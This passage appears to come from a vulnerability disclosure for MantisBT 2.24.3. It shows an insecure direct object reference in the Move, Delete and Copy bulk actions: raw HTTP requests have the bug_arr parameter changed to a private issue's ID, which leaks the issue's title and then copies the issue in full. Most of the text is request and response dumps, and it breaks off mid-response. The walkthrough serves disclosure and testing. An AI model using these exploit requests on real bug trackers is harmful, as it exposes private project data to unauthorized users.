<div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">
<div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=8">View Submitted Issue 8</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br>
<small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script>
</body>
</html>
```

### Launch attack

-as manager go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8)

- 2 vulnerable function here are ``Move`` and ``Delete``, lets start with ``move`` functionality

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE
```

- Just edit the ``bug_arr%5B%5D=`` to ``7`` <- private issue and it will render the summary/title of the issue

- ``Delete`` functionality is almost the same

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE

```

- Take note you can't move/delete these issues, it returns ``You did not have appropriate permissions to perform that action.`` however its too late, the summary/title already leaked..


### Copying issues : For fun fun fun!


- In this part the attacker manage to **fully leaked** the issues

- As malicious actor go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184)

- You can see the ``Viewing issues`` part and the ``select all`` checkbox and a dropdown..

- The problem on this dropdown is the ``Copy`` functionality

> Note : I notice that the ``Assigned to Me (Unresolved)`` have different number of parameters,the ``bug_arr_all=all`` is required, go select the ``Assigned to Me (Unresolved)`` compare to ``unassigned`` which doesn't have ``bug_arr_all=all``

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=COPY
```

**Normal response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:50:18 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:50:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11551
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" />

	<link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" />
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/>
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script>
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
 first project 
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li>
<li class="divider"></li>
<li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt/mantisbt-2.24.3/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/summary_page.php">
<i class="menu-icon fa fa-bar-chart-o"></i> 
<span class="menu-text"> Summary </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
		class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a>
  <span class="label hidden-xs label-default arrowed">manager</span></li>
</ul>
<div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">

<div class="col-md-12 col-xs-12">
<div id="action-group-div" class="form-container">
	<form method="post" action="bug_actiongroup.php">
		<input type="hidden" name="bug_actiongroup_COPY_token" value="20200927tSfUmsUZ6RBtNUVr78zlF6QZ6wmCIpSR"/>		<input type="hidden" name="action" value="COPY" />
<input type="hidden" name="bug_arr[]" value="8" />
<div class="widget-box widget-color-blue2">
<div class="widget-header widget-header-small">
	<h4 class="widget-title lighter">
		Copy issues to	</h4>
</div>
<div class="widget-body">
	<div class="widget-main no-padding">
		<div class="table-responsive">
			<table class="table table-bordered table-condensed table-striped">
			<tbody>
				<tr>
					<th class="category">
						Copy issues to					</th>
					<td>
<select name="project_id" class="input-sm" required><option value="1">first project</option>
</select>					</td>
				</tr>
		<tr class="spacer"></tr>
		<tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i>  <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a></td> <td>Hello I am the attacker</td> </tr>
		<tr class="spacer"></tr>
			</tbody>
		</table>
		</div>
		</div>
		<div class="widget-toolbox padding-8 clearfix">
			<input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" />
		</div>
		</div>
		</div>
	</form>
</div>
</div>

</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br>
<small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script>
</body>
</html>

```

- Change the value of ``bug_arr%5B%5D=`` to ``7``

**Exploit request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=7&bug_arr_all=all&action=COPY
```

**Exploit response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:51:40 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:51:40 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:51:40 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11070
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" />

	<link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" />
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/>
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script>
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
 second project 
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li>
<li class="divider"></li>
<li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt/mantisbt-2.24.3/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
		class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a>
  <span class="label hidden-xs label-default arrowed">manager</span></li>
</ul>
<div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">

<div class="col-md-12 col-xs-12">
<div id="action-group-div" class="form-container">
	<form method="post" action="bug_actiongroup.php">
		<input type="hidden" name="bug_actiongroup_COPY_token" value="20200927YQX5myIJlc0m_RVH6oqWVPd02Z4ncKwU"/>		<input type="hidden" name="action" value="COPY" />
<input type="hidden" name="bug_arr[]" value="7" />
<div class="widget-box widget-color-blue2">
<div class="widget-header widget-header-small">
	<h4 class="widget-title lighter">
		Copy issues to	</h4>
</div>
<div class="widget-body">
	<div class="widget-main no-padding">
		<div class="table-responsive">
			<table class="table table-bordered table-condensed table-striped">
			<tbody>
				<tr>
					<th class="category">
						Copy issues to					</th>
					<td>
<select name="project_id" class="input-sm" required><option value="1">first project</option>
</select>					</td>
				</tr>
		<tr class="spacer"></tr>
